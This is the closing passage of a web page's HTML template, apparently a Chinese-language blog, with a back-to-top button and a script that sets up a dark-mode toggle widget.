                <!-- 回到顶部的按钮-->  
                <div class="progress-wrap shadow-drop-2-bottom">
                    <svg class="progress-circle svg-content" width="100%" height="100%" viewBox="-1 -1 102 102">
                        <path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98"/>
                    </svg>
                </div>
            
    </body>


    <!--暗黑模式-->
    <script src="/js/darkmode-js.min.js"></script>
    <script>
        function addDarkmodeWidget() {
        const options = {
            bottom: '53px', // default: '32px'
            right: 'unset', // default: '32px'
            left: '42px', // default: 'unset'
            time: '0.3s', // default: '0.3s'
            mixColor: '#fff', // default: '#fff'
            backgroundColor: ' #e4e4e4  ',  // default: '#fff'
            buttonColorDark: '#100f2c',  // default: '#100f2c'
            buttonColorLight: '#fff', // default: '#fff'
            saveInCookies: true, // default: true,
            label: '🌓', // default: ''
            autoMatchOsTheme: true // default: true
        }
    
        const darkmode = new Darkmode(options);
        darkmode.showWidget();
        
        }
        window.addEventListener('load', addDarkmodeWidget);
    </script>
  
</html>